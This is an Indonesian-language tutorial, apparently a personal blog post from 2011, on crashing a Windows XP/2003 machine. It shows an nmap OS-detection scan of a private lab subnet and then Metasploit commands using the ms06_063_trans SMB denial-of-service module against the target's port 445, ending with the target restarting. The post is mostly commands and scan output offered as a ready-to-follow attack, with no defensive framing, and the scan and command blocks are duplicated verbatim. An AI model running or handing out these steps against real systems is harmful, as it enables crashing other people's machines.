1. lakukan scanning port menggunakan nmap dengan range.
root@dumbastish:~# nmap -O 192.168.56.1/24
hasil :
root@dumbastish:~# nmap -O 192.168.56.1/24
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-12-20 17:59 WIT
Nmap scan report for 192.168.56.1
Host is up (0.000047s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
21/tcp open ftp
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.19 - 2.6.39
Network Distance: 0 hops
Nmap scan report for 192.168.56.100
Host is up (0.000029s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:61:7C:24 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Nmap scan report for 192.168.56.101
Host is up (0.00045s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
4444/tcp open krb524
MAC Address: 08:00:27:FC:BF:0A (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 23.50 seconds
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-12-20 17:59 WIT
Nmap scan report for 192.168.56.1
Host is up (0.000047s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
21/tcp open ftp
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.19 - 2.6.39
Network Distance: 0 hops
Nmap scan report for 192.168.56.100
Host is up (0.000029s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:61:7C:24 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Nmap scan report for 192.168.56.101
Host is up (0.00045s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
4444/tcp open krb524
MAC Address: 08:00:27:FC:BF:0A (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 23.50 seconds
root@dumbastish:~#
192.168.56.101 adalah komputer target dengan port 445 terbuka
2. buka metasploit anda lalu gunakan dos/windows/smb/ms06_063_trans, tulis seperti dibawah ini
use dos/windows/smb/ms06_063_trans
set LPORT 445
set RHOST 192.168.56.101
run
set LPORT 445
set RHOST 192.168.56.101
run
3. yeah , setelah metasploit running maka komputer target mengalami shock, melakukan restart .
 |
| restart-1 |
 |
| restart-2 |
 | ||||||
| restart-3 |
semoga bermanfaat bagi anda semua
regards, dumbastish
